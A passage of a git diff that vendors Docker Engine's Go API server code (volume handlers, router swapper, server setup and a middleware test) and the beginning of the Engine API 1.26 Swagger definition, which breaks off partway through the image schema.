*volumeRouter) getVolumesList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + volumes, warnings, err := v.backend.Volumes(r.Form.Get("filters")) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, &volumetypes.VolumesListOKBody{Volumes: volumes, Warnings: 
warnings}) +} + +func (v *volumeRouter) getVolumeByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + volume, err := v.backend.VolumeInspect(vars["name"]) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, volume) +} + +func (v *volumeRouter) postVolumesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + var req volumetypes.VolumesCreateBody + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + + volume, err := v.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusCreated, volume) +} + +func (v *volumeRouter) deleteVolumes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + force := httputils.BoolValue(r, "force") + if err := v.backend.VolumeRm(vars["name"], force); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (v *volumeRouter) postVolumesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneReport, err := v.backend.VolumesPrune(filters.Args{}) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router_swapper.go b/vendor/github.com/docker/docker/api/server/router_swapper.go new file mode 100644 index 0000000000..1ecc7a7f39 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router_swapper.go @@ -0,0 +1,30 @@ +package server + 
+import ( + "net/http" + "sync" + + "github.com/gorilla/mux" +) + +// routerSwapper is an http.Handler that allows you to swap +// mux routers. +type routerSwapper struct { + mu sync.Mutex + router *mux.Router +} + +// Swap changes the old router with the new one. +func (rs *routerSwapper) Swap(newRouter *mux.Router) { + rs.mu.Lock() + rs.router = newRouter + rs.mu.Unlock() +} + +// ServeHTTP makes the routerSwapper to implement the http.Handler interface. +func (rs *routerSwapper) ServeHTTP(w http.ResponseWriter, r *http.Request) { + rs.mu.Lock() + router := rs.router + rs.mu.Unlock() + router.ServeHTTP(w, r) +} diff --git a/vendor/github.com/docker/docker/api/server/server.go b/vendor/github.com/docker/docker/api/server/server.go new file mode 100644 index 0000000000..60ee075c79 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/server.go @@ -0,0 +1,210 @@ +package server + +import ( + "crypto/tls" + "fmt" + "net" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" + "github.com/docker/docker/api/server/router" + "github.com/gorilla/mux" + "golang.org/x/net/context" +) + +// versionMatcher defines a variable matcher to be parsed by the router +// when a request is about to be served. +const versionMatcher = "/v{version:[0-9.]+}" + +// Config provides the configuration for the API server +type Config struct { + Logging bool + EnableCors bool + CorsHeaders string + Version string + SocketGroup string + TLSConfig *tls.Config +} + +// Server contains instance details for the server +type Server struct { + cfg *Config + servers []*HTTPServer + routers []router.Router + routerSwapper *routerSwapper + middlewares []middleware.Middleware +} + +// New returns a new instance of the server based on the specified configuration. +// It allocates resources which will be needed for ServeAPI(ports, unix-sockets). 
+func New(cfg *Config) *Server { + return &Server{ + cfg: cfg, + } +} + +// UseMiddleware appends a new middleware to the request chain. +// This needs to be called before the API routes are configured. +func (s *Server) UseMiddleware(m middleware.Middleware) { + s.middlewares = append(s.middlewares, m) +} + +// Accept sets a listener the server accepts connections into. +func (s *Server) Accept(addr string, listeners ...net.Listener) { + for _, listener := range listeners { + httpServer := &HTTPServer{ + srv: &http.Server{ + Addr: addr, + }, + l: listener, + } + s.servers = append(s.servers, httpServer) + } +} + +// Close closes servers and thus stop receiving requests +func (s *Server) Close() { + for _, srv := range s.servers { + if err := srv.Close(); err != nil { + logrus.Error(err) + } + } +} + +// serveAPI loops through all initialized servers and spawns goroutine +// with Serve method for each. It sets createMux() as Handler also. +func (s *Server) serveAPI() error { + var chErrors = make(chan error, len(s.servers)) + for _, srv := range s.servers { + srv.srv.Handler = s.routerSwapper + go func(srv *HTTPServer) { + var err error + logrus.Infof("API listen on %s", srv.l.Addr()) + if err = srv.Serve(); err != nil && strings.Contains(err.Error(), "use of closed network connection") { + err = nil + } + chErrors <- err + }(srv) + } + + for i := 0; i < len(s.servers); i++ { + err := <-chErrors + if err != nil { + return err + } + } + + return nil +} + +// HTTPServer contains an instance of http server and the listener. +// srv *http.Server, contains configuration to create an http server and a mux router with all api end points. +// l net.Listener, is a TCP or Socket listener that dispatches incoming request to the router. +type HTTPServer struct { + srv *http.Server + l net.Listener +} + +// Serve starts listening for inbound requests. 
+func (s *HTTPServer) Serve() error { + return s.srv.Serve(s.l) +} + +// Close closes the HTTPServer from listening for the inbound requests. +func (s *HTTPServer) Close() error { + return s.l.Close() +} + +func (s *Server) makeHTTPHandler(handler httputils.APIFunc) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + // Define the context that we'll pass around to share info + // like the docker-request-id. + // + // The 'context' will be used for global data that should + // apply to all requests. Data that is specific to the + // immediate function being called should still be passed + // as 'args' on the function call. + ctx := context.WithValue(context.Background(), httputils.UAStringKey, r.Header.Get("User-Agent")) + handlerFunc := s.handlerWithGlobalMiddlewares(handler) + + vars := mux.Vars(r) + if vars == nil { + vars = make(map[string]string) + } + + if err := handlerFunc(ctx, w, r, vars); err != nil { + statusCode := httputils.GetHTTPErrorStatusCode(err) + errFormat := "%v" + if statusCode == http.StatusInternalServerError { + errFormat = "%+v" + } + logrus.Errorf("Handler for %s %s returned error: "+errFormat, r.Method, r.URL.Path, err) + httputils.MakeErrorHandler(err)(w, r) + } + } +} + +// InitRouter initializes the list of routers for the server. +// This method also enables the Go profiler if enableProfiler is true. +func (s *Server) InitRouter(enableProfiler bool, routers ...router.Router) { + s.routers = append(s.routers, routers...) + + m := s.createMux() + if enableProfiler { + profilerSetup(m) + } + s.routerSwapper = &routerSwapper{ + router: m, + } +} + +// createMux initializes the main router the server uses. 
+func (s *Server) createMux() *mux.Router { + m := mux.NewRouter() + + logrus.Debug("Registering routers") + for _, apiRouter := range s.routers { + for _, r := range apiRouter.Routes() { + f := s.makeHTTPHandler(r.Handler()) + + logrus.Debugf("Registering %s, %s", r.Method(), r.Path()) + m.Path(versionMatcher + r.Path()).Methods(r.Method()).Handler(f) + m.Path(r.Path()).Methods(r.Method()).Handler(f) + } + } + + err := errors.NewRequestNotFoundError(fmt.Errorf("page not found")) + notFoundHandler := httputils.MakeErrorHandler(err) + m.HandleFunc(versionMatcher+"/{path:.*}", notFoundHandler) + m.NotFoundHandler = notFoundHandler + + return m +} + +// Wait blocks the server goroutine until it exits. +// It sends an error message if there is any error during +// the API execution. +func (s *Server) Wait(waitChan chan error) { + if err := s.serveAPI(); err != nil { + logrus.Errorf("ServeAPI error: %v", err) + waitChan <- err + return + } + waitChan <- nil +} + +// DisableProfiler reloads the server mux without adding the profiler routes. +func (s *Server) DisableProfiler() { + s.routerSwapper.Swap(s.createMux()) +} + +// EnableProfiler reloads the server mux adding the profiler routes. 
+func (s *Server) EnableProfiler() { + m := s.createMux() + profilerSetup(m) + s.routerSwapper.Swap(m) +} diff --git a/vendor/github.com/docker/docker/api/server/server_test.go b/vendor/github.com/docker/docker/api/server/server_test.go new file mode 100644 index 0000000000..11831c148d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/server_test.go @@ -0,0 +1,46 @@ +package server + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" + + "golang.org/x/net/context" +) + +func TestMiddlewares(t *testing.T) { + cfg := &Config{ + Version: "0.1omega2", + } + srv := &Server{ + cfg: cfg, + } + + srv.UseMiddleware(middleware.NewVersionMiddleware("0.1omega2", api.DefaultVersion, api.MinVersion)) + + req, _ := http.NewRequest("GET", "/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + + localHandler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + + if sv := w.Header().Get("Server"); !strings.Contains(sv, "Docker/0.1omega2") { + t.Fatalf("Expected server version in the header `Docker/0.1omega2`, got %s", sv) + } + + return nil + } + + handlerFunc := srv.handlerWithGlobalMiddlewares(localHandler) + if err := handlerFunc(ctx, resp, req, map[string]string{}); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/api/swagger-gen.yaml b/vendor/github.com/docker/docker/api/swagger-gen.yaml new file mode 100644 index 0000000000..f07a02737f --- /dev/null +++ b/vendor/github.com/docker/docker/api/swagger-gen.yaml @@ -0,0 +1,12 @@ + +layout: + models: + - name: definition + source: asset:model + target: "{{ joinFilePath .Target .ModelPackage }}" + file_name: "{{ (snakize (pascalize .Name)) }}.go" + 
operations: + - name: handler + source: asset:serverOperation + target: "{{ joinFilePath .Target .APIPackage .Package }}" + file_name: "{{ (snakize (pascalize .Name)) }}.go" diff --git a/vendor/github.com/docker/docker/api/swagger.yaml b/vendor/github.com/docker/docker/api/swagger.yaml new file mode 100644 index 0000000000..d19e8c9ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/swagger.yaml @@ -0,0 +1,7785 @@ +# A Swagger 2.0 (a.k.a. OpenAPI) definition of the Engine API. +# +# This is used for generating API documentation and the types used by the +# client/server. See api/README.md for more information. +# +# Some style notes: +# - This file is used by ReDoc, which allows GitHub Flavored Markdown in +# descriptions. +# - There is no maximum line length, for ease of editing and pretty diffs. +# - operationIds are in the format "NounVerb", with a singular noun. + +swagger: "2.0" +schemes: + - "http" + - "https" +produces: + - "application/json" + - "text/plain" +consumes: + - "application/json" + - "text/plain" +basePath: "/v1.26" +info: + title: "Docker Engine API" + version: "1.26" + x-logo: + url: "https://docs.docker.com/images/logo-docker-main.png" + description: | + The Engine API is an HTTP API served by Docker Engine. It is the API the Docker client uses to communicate with the Engine, so everything the Docker client can do can be done with the API. + + Most of the client's commands map directly to API endpoints (e.g. `docker ps` is `GET /containers/json`). The notable exception is running containers, which consists of several API calls. + + # Errors + + The API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format: + + ``` + { + "message": "page not found" + } + ``` + + # Versioning + + The API is usually changed in each release of Docker, so API calls are versioned to ensure that clients don't break. 
+ + For Docker Engine >= 1.13.1, the API version is 1.26. To lock to this version, you prefix the URL with `/v1.26`. For example, calling `/info` is the same as calling `/v1.26/info`. + + Engine releases in the near future should support this version of the API, so your client will continue to work even if it is talking to a newer Engine. + + In previous versions of Docker, it was possible to access the API without providing a version. This behaviour is now deprecated and will be removed in a future version of Docker. + + The API uses an open schema model, which means the server may add extra properties to responses. Likewise, the server will ignore any extra query parameters and request body properties. When you write clients, you need to ignore additional properties in responses to ensure they do not break when talking to newer Docker daemons. + + This documentation is for version 1.26 of the API, which was introduced with Docker 1.13.1. Use this table to find documentation for previous versions of the API: + + Docker version | API version | Changes + ----------------|-------------|--------- + 1.13.0 | [1.25](https://docs.docker.com/engine/api/v1.25/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-25-api-changes) + 1.12.x | [1.24](https://docs.docker.com/engine/api/v1.24/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-24-api-changes) + 1.11.x | [1.23](https://docs.docker.com/engine/api/v1.23/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-23-api-changes) + 1.10.x | [1.22](https://docs.docker.com/engine/api/v1.22/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-22-api-changes) + 1.9.x | [1.21](https://docs.docker.com/engine/api/v1.21/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-21-api-changes) + 1.8.x | [1.20](https://docs.docker.com/engine/api/v1.20/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-20-api-changes) + 1.7.x |
[1.19](https://docs.docker.com/engine/api/v1.19/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-19-api-changes) + 1.6.x | [1.18](https://docs.docker.com/engine/api/v1.18/) | [API changes](https://docs.docker.com/engine/api/version-history/#v1-18-api-changes) + + # Authentication + + Authentication for registries is handled client side. The client has to send authentication details to various endpoints that need to communicate with registries, such as `POST /images/(name)/push`. These are sent as `X-Registry-Auth` header as a Base64 encoded (JSON) string with the following structure: + + ``` + { + "username": "string", + "password": "string", + "email": "string", + "serveraddress": "string" + } + ``` + + The `serveraddress` is a domain/IP without a protocol. Throughout this structure, double quotes are required. + + If you have already got an identity token from the [`/auth` endpoint](#operation/SystemAuth), you can just pass this instead of credentials: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +# The tags on paths define the menu sections in the ReDoc documentation, so +# the usage of tags must make sense for that: +# - They should be singular, not plural. +# - There should not be too many tags, or the menu becomes unwieldly. For +# example, it is preferable to add a path to the "System" tag instead of +# creating a tag with a single path in it. +# - The order of tags in this list defines the order in the menu. +tags: + # Primary objects + - name: "Container" + x-displayName: "Containers" + description: | + Create and manage containers. + - name: "Image" + x-displayName: "Images" + - name: "Network" + x-displayName: "Networks" + description: | + Networks are user-defined networks that containers can be attached to. See the [networking documentation](https://docs.docker.com/engine/userguide/networking/) for more information. 
+ - name: "Volume" + x-displayName: "Volumes" + description: | + Create and manage persistent storage that can be attached to containers. + - name: "Exec" + x-displayName: "Exec" + description: | + Run new commands inside running containers. See the [command-line reference](https://docs.docker.com/engine/reference/commandline/exec/) for more information. + + To exec a command in a container, you first need to create an exec instance, then start it. These two API endpoints are wrapped up in a single command-line command, `docker exec`. + - name: "Secret" + x-displayName: "Secrets" + # Swarm things + - name: "Swarm" + x-displayName: "Swarm" + description: | + Engines can be clustered together in a swarm. See [the swarm mode documentation](https://docs.docker.com/engine/swarm/) for more information. + - name: "Node" + x-displayName: "Nodes" + description: | + Nodes are instances of the Engine participating in a swarm. Swarm mode must be enabled for these endpoints to work. + - name: "Service" + x-displayName: "Services" + description: | + Services are the definitions of tasks to run on a swarm. Swarm mode must be enabled for these endpoints to work. + - name: "Task" + x-displayName: "Tasks" + description: | + A task is a container running on a swarm. It is the atomic scheduling unit of swarm. Swarm mode must be enabled for these endpoints to work. 
+ # System things + - name: "Plugin" + x-displayName: "Plugins" + - name: "System" + x-displayName: "System" + +definitions: + Port: + type: "object" + description: "An open port on a container" + required: [PrivatePort, Type] + properties: + IP: + type: "string" + format: "ip-address" + PrivatePort: + type: "integer" + format: "uint16" + x-nullable: false + description: "Port on the container" + PublicPort: + type: "integer" + format: "uint16" + description: "Port exposed on the host" + Type: + type: "string" + x-nullable: false + enum: ["tcp", "udp"] + example: + PrivatePort: 8080 + PublicPort: 80 + Type: "tcp" + + MountPoint: + type: "object" + description: "A mount point inside a container" + properties: + Type: + type: "string" + Name: + type: "string" + Source: + type: "string" + Destination: + type: "string" + Driver: + type: "string" + Mode: + type: "string" + RW: + type: "boolean" + Propagation: + type: "string" + + DeviceMapping: + type: "object" + description: "A device mapping between the host and container" + properties: + PathOnHost: + type: "string" + PathInContainer: + type: "string" + CgroupPermissions: + type: "string" + example: + PathOnHost: "/dev/deviceName" + PathInContainer: "/dev/deviceName" + CgroupPermissions: "mrw" + + ThrottleDevice: + type: "object" + properties: + Path: + description: "Device path" + type: "string" + Rate: + description: "Rate" + type: "integer" + format: "int64" + minimum: 0 + + Mount: + type: "object" + properties: + Target: + description: "Container path." + type: "string" + Source: + description: "Mount source (e.g. a volume name, a host path)." + Type: + description: | + The mount type. Available types: + + - `bind` Mounts a file or directory from the host into the container. Must exist prior to creating the container. + - `volume` Creates a volume with the given name and options (or uses a pre-existing volume with the same name and options). These are **not** removed when the container is removed. 
+ - `tmpfs` Create a tmpfs with the given options. The mount source cannot be specified for tmpfs. + type: "string" + enum: + - "bind" + - "volume" + - "tmpfs" + ReadOnly: + description: "Whether the mount should be read-only." + type: "boolean" + BindOptions: + description: "Optional configuration for the `bind` type." + type: "object" + properties: + Propagation: + description: "A propagation mode with the value `[r]private`, `[r]shared`, or `[r]slave`." + enum: + - "private" + - "rprivate" + - "shared" + - "rshared" + - "slave" + - "rslave" + VolumeOptions: + description: "Optional configuration for the `volume` type." + type: "object" + properties: + NoCopy: + description: "Populate volume with data from the target." + type: "boolean" + default: false + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + DriverConfig: + description: "Map of driver specific options" + type: "object" + properties: + Name: + description: "Name of the driver to use to create the volume." + type: "string" + Options: + description: "key/value map of driver specific options." + type: "object" + additionalProperties: + type: "string" + TmpfsOptions: + description: "Optional configuration for the `tmpfs` type." + type: "object" + properties: + SizeBytes: + description: "The size for the tmpfs mount in bytes." + type: "integer" + format: "int64" + Mode: + description: "The permission mode for the tmpfs mount in an integer." + type: "integer" + RestartPolicy: + description: | + The behavior to apply when the container exits. The default is not to restart. + + An ever increasing delay (double the previous delay, starting at 100ms) is added before each restart to prevent flooding the server. 
+ type: "object" + properties: + Name: + type: "string" + description: | + - `always` Always restart + - `unless-stopped` Restart always except when the user has manually stopped the container + - `on-failure` Restart only when the container exit code is non-zero + enum: + - "always" + - "unless-stopped" + - "on-failure" + MaximumRetryCount: + type: "integer" + description: "If `on-failure` is used, the number of times to retry before giving up" + default: {} + + Resources: + description: "A container's resources (cgroups config, ulimits, etc)" + type: "object" + properties: + # Applicable to all platforms + CpuShares: + description: "An integer value representing this container's relative CPU weight versus other containers." + type: "integer" + Memory: + description: "Memory limit in bytes." + type: "integer" + default: 0 + # Applicable to UNIX platforms + CgroupParent: + description: "Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist." + type: "string" + BlkioWeight: + description: "Block IO weight (relative weight)." + type: "integer" + minimum: 0 + maximum: 1000 + BlkioWeightDevice: + description: | + Block IO weight (relative device weight) in the form `[{"Path": "device_path", "Weight": weight}]`. + type: "array" + items: + type: "object" + properties: + Path: + type: "string" + Weight: + type: "integer" + minimum: 0 + BlkioDeviceReadBps: + description: | + Limit read rate (bytes per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceWriteBps: + description: | + Limit write rate (bytes per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`. 
+ type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceReadIOps: + description: | + Limit read rate (IO per second) from a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + BlkioDeviceWriteIOps: + description: | + Limit write rate (IO per second) to a device, in the form `[{"Path": "device_path", "Rate": rate}]`. + type: "array" + items: + $ref: "#/definitions/ThrottleDevice" + CpuPeriod: + description: "The length of a CPU period in microseconds." + type: "integer" + format: "int64" + CpuQuota: + description: "Microseconds of CPU time that the container can get in a CPU period." + type: "integer" + format: "int64" + CpuRealtimePeriod: + description: "The length of a CPU real-time period in microseconds. Set to 0 to allocate no time allocated to real-time tasks." + type: "integer" + format: "int64" + CpuRealtimeRuntime: + description: "The length of a CPU real-time runtime in microseconds. Set to 0 to allocate no time allocated to real-time tasks." + type: "integer" + format: "int64" + CpusetCpus: + description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)" + type: "string" + CpusetMems: + description: "Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems." + type: "string" + Devices: + description: "A list of devices to add to the container." + type: "array" + items: + $ref: "#/definitions/DeviceMapping" + DiskQuota: + description: "Disk limit (in bytes)." + type: "integer" + format: "int64" + KernelMemory: + description: "Kernel memory limit in bytes." + type: "integer" + format: "int64" + MemoryReservation: + description: "Memory soft limit in bytes." + type: "integer" + format: "int64" + MemorySwap: + description: "Total memory limit (memory + swap). Set as `-1` to enable unlimited swap." + type: "integer" + format: "int64" + MemorySwappiness: + description: "Tune a container's memory swappiness behavior. 
Accepts an integer between 0 and 100." + type: "integer" + format: "int64" + minimum: 0 + maximum: 100 + NanoCPUs: + description: "CPU quota in units of 10-9 CPUs." + type: "integer" + format: "int64" + OomKillDisable: + description: "Disable OOM Killer for the container." + type: "boolean" + PidsLimit: + description: "Tune a container's pids limit. Set -1 for unlimited." + type: "integer" + format: "int64" + Ulimits: + description: | + A list of resource limits to set in the container. For example: `{"Name": "nofile", "Soft": 1024, "Hard": 2048}`" + type: "array" + items: + type: "object" + properties: + Name: + description: "Name of ulimit" + type: "string" + Soft: + description: "Soft limit" + type: "integer" + Hard: + description: "Hard limit" + type: "integer" + # Applicable to Windows + CpuCount: + description: | + The number of usable CPUs (Windows only). + + On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last. + type: "integer" + format: "int64" + CpuPercent: + description: | + The usable percentage of the available CPUs (Windows only). + + On Windows Server containers, the processor resource controls are mutually exclusive. The order of precedence is `CPUCount` first, then `CPUShares`, and `CPUPercent` last. + type: "integer" + format: "int64" + IOMaximumIOps: + description: "Maximum IOps for the container system drive (Windows only)" + type: "integer" + format: "int64" + IOMaximumBandwidth: + description: "Maximum IO in bytes per second for the container system drive (Windows only)" + type: "integer" + format: "int64" + + HostConfig: + description: "Container configuration that depends on the host we are running on" + allOf: + - $ref: "#/definitions/Resources" + - type: "object" + properties: + # Applicable to all platforms + Binds: + type: "array" + description: | + A list of volume bindings for this container. 
Each volume binding is a string in one of these forms: + + - `host-src:container-dest` to bind-mount a host path into the container. Both `host-src`, and `container-dest` must be an _absolute_ path. + - `host-src:container-dest:ro` to make the bind-mount read-only inside the container. Both `host-src`, and `container-dest` must be an _absolute_ path. + - `volume-name:container-dest` to bind-mount a volume managed by a volume driver into the container. `container-dest` must be an _absolute_ path. + - `volume-name:container-dest:ro` to mount the volume read-only inside the container. `container-dest` must be an _absolute_ path. + items: + type: "string" + ContainerIDFile: + type: "string" + description: "Path to a file where the container ID is written" + LogConfig: + type: "object" + description: "The logging configuration for this container" + properties: + Type: + type: "string" + enum: + - "json-file" + - "syslog" + - "journald" + - "gelf" + - "fluentd" + - "awslogs" + - "splunk" + - "etwlogs" + - "none" + Config: + type: "object" + additionalProperties: + type: "string" + NetworkMode: + type: "string" + description: "Network mode to use for this container. Supported standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to." + PortBindings: + type: "object" + description: "A map of exposed container ports and the host port they should map to." + additionalProperties: + type: "object" + properties: + HostIp: + type: "string" + description: "The host IP address" + HostPort: + type: "string" + description: "The host port number, as a string" + RestartPolicy: + $ref: "#/definitions/RestartPolicy" + AutoRemove: + type: "boolean" + description: "Automatically remove the container when the container's process exits. This has no effect if `RestartPolicy` is set." + VolumeDriver: + type: "string" + description: "Driver that this container uses to mount volumes." 
+ VolumesFrom: + type: "array" + description: "A list of volumes to inherit from another container, specified in the form `[:]`." + items: + type: "string" + Mounts: + description: "Specification for mounts to be added to the container." + type: "array" + items: + $ref: "#/definitions/Mount" + + # Applicable to UNIX platforms + CapAdd: + type: "array" + description: "A list of kernel capabilities to add to the container." + items: + type: "string" + CapDrop: + type: "array" + description: "A list of kernel capabilities to drop from the container." + items: + type: "string" + Dns: + type: "array" + description: "A list of DNS servers for the container to use." + items: + type: "string" + DnsOptions: + type: "array" + description: "A list of DNS options." + items: + type: "string" + DnsSearch: + type: "array" + description: "A list of DNS search domains." + items: + type: "string" + ExtraHosts: + type: "array" + description: | + A list of hostnames/IP mappings to add to the container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + items: + type: "string" + GroupAdd: + type: "array" + description: "A list of additional groups that the container process will run as." + items: + type: "string" + IpcMode: + type: "string" + description: "IPC namespace to use for the container." + Cgroup: + type: "string" + description: "Cgroup to use for the container." + Links: + type: "array" + description: "A list of links for the container in the form `container_name:alias`." + items: + type: "string" + OomScoreAdj: + type: "integer" + description: "An integer value containing the score given to the container in order to tune OOM killer preferences." + PidMode: + type: "string" + description: | + Set the PID (Process) Namespace mode for the container. 
It can be either: + + - `"container:"`: joins another container's PID namespace + - `"host"`: use the host's PID namespace inside the container + Privileged: + type: "boolean" + description: "Gives the container full access to the host." + PublishAllPorts: + type: "boolean" + description: "Allocates a random host port for all of a container's exposed ports." + ReadonlyRootfs: + type: "boolean" + description: "Mount the container's root filesystem as read only." + SecurityOpt: + type: "array" + description: "A list of string values to customize labels for MLS + systems, such as SELinux." + items: + type: "string" + StorageOpt: + type: "object" + description: | + Storage driver options for this container, in the form `{"size": "120G"}`. + additionalProperties: + type: "string" + Tmpfs: + type: "object" + description: | + A map of container directories which should be replaced by tmpfs mounts, and their corresponding mount options. For example: `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + additionalProperties: + type: "string" + UTSMode: + type: "string" + description: "UTS namespace to use for the container." + UsernsMode: + type: "string" + description: "Sets the usernamespace mode for the container when usernamespace remapping option is enabled." + ShmSize: + type: "integer" + description: "Size of `/dev/shm` in bytes. If omitted, the system uses 64MB." + minimum: 0 + Sysctls: + type: "object" + description: | + A list of kernel parameters (sysctls) to set in the container. For example: `{"net.ipv4.ip_forward": "1"}` + additionalProperties: + type: "string" + Runtime: + type: "string" + description: "Runtime to use with this container." + # Applicable to Windows + ConsoleSize: + type: "array" + description: "Initial console size, as an `[height, width]` array. (Windows only)" + minItems: 2 + maxItems: 2 + items: + type: "integer" + minimum: 0 + Isolation: + type: "string" + description: "Isolation technology of the container. 
(Windows only)" + enum: + - "default" + - "process" + - "hyperv" + + Config: + description: "Configuration for a container that is portable between hosts" + type: "object" + properties: + Hostname: + description: "The hostname to use for the container, as a valid RFC 1123 hostname." + type: "string" + Domainname: + description: "The domain name to use for the container." + type: "string" + User: + description: "The user that commands are run as inside the container." + type: "string" + AttachStdin: + description: "Whether to attach to `stdin`." + type: "boolean" + default: false + AttachStdout: + description: "Whether to attach to `stdout`." + type: "boolean" + default: true + AttachStderr: + description: "Whether to attach to `stderr`." + type: "boolean" + default: true + ExposedPorts: + description: | + An object mapping ports to an empty object in the form: + + `{"/": {}}` + type: "object" + additionalProperties: + type: "object" + enum: + - {} + default: {} + Tty: + description: "Attach standard streams to a TTY, including `stdin` if it is not closed." + type: "boolean" + default: false + OpenStdin: + description: "Open `stdin`" + type: "boolean" + default: false + StdinOnce: + description: "Close `stdin` after one attached client disconnects" + type: "boolean" + default: false + Env: + description: | + A list of environment variables to set inside the container in the form `["VAR=value", ...]` + type: "array" + items: + type: "string" + Cmd: + description: "Command to run specified as a string or an array of strings." + type: + - "array" + - "string" + items: + type: "string" + Healthcheck: + description: "A test to perform to check that the container is healthy." + type: "object" + properties: + Test: + description: | + The test to perform. 
Possible values are: + + - `{}` inherit healthcheck from image or parent image + - `{"NONE"}` disable healthcheck + - `{"CMD", args...}` exec arguments directly + - `{"CMD-SHELL", command}` run command with system's default shell + type: "array" + items: + type: "string" + Interval: + description: "The time to wait between checks in nanoseconds. 0 means inherit." + type: "integer" + Timeout: + description: "The time to wait before considering the check to have hung. 0 means inherit." + type: "integer" + Retries: + description: "The number of consecutive failures needed to consider a container as unhealthy. 0 means inherit." + type: "integer" + ArgsEscaped: + description: "Command is already escaped (Windows only)" + type: "boolean" + Image: + description: "The name of the image to use when creating the container" + type: "string" + Volumes: + description: "An object mapping mount point paths inside the container to empty objects." + type: "object" + properties: + additionalProperties: + type: "object" + enum: + - {} + default: {} + WorkingDir: + description: "The working directory for commands to run in." + type: "string" + Entrypoint: + description: | + The entry point for the container as a string or an array of strings. + + If the array consists of exactly one empty string (`[""]`) then the entry point is reset to system default (i.e., the entry point used by docker when there is no `ENTRYPOINT` instruction in the `Dockerfile`). + type: + - "array" + - "string" + items: + type: "string" + NetworkDisabled: + description: "Disable networking for the container." + type: "boolean" + MacAddress: + description: "MAC address of the container." + type: "string" + OnBuild: + description: "`ONBUILD` metadata that were defined in the image's `Dockerfile`." + type: "array" + items: + type: "string" + Labels: + description: "User-defined key/value metadata." 
+ type: "object" + additionalProperties: + type: "string" + StopSignal: + description: "Signal to stop a container as a string or unsigned integer." + type: "string" + default: "SIGTERM" + StopTimeout: + description: "Timeout to stop a container in seconds." + type: "integer" + default: 10 + Shell: + description: "Shell for when `RUN`, `CMD`, and `ENTRYPOINT` uses a shell." + type: "array" + items: + type: "string" + + NetworkConfig: + description: "TODO: check is correct" + type: "object" + properties: + Bridge: + type: "string" + Gateway: + type: "string" + Address: + type: "string" + IPPrefixLen: + type: "integer" + MacAddress: + type: "string" + PortMapping: + type: "string" + Ports: + type: "array" + items: + $ref: "#/definitions/Port" + + GraphDriver: + description: "Information about this container's graph driver." + type: "object" + properties: + Name: + type: "string" + Data: + type: "object" + additionalProperties: + type: "string" + + Image: + type: "object" + properties: + Id: + type: "string" + RepoTags: + type: "array" + items: + type: "string" + RepoDigests: + type: "array" + items: + type: "string" + Parent: + type: "string" + Comment: + type: "string" + Created: + type: "string" + Container: + type: "string" + ContainerConfig: + $ref: "#/definitions/Config" + DockerVersion: + type: "string" + Author: + type: "string" + Config: + $ref: "#/definitions/Config" + Architecture: + type: "string" + Os: + type: "string" + Size: + type: "integer" + format: "int64" + VirtualSize: + type: "integer" + format: "int64" + GraphDriver: + 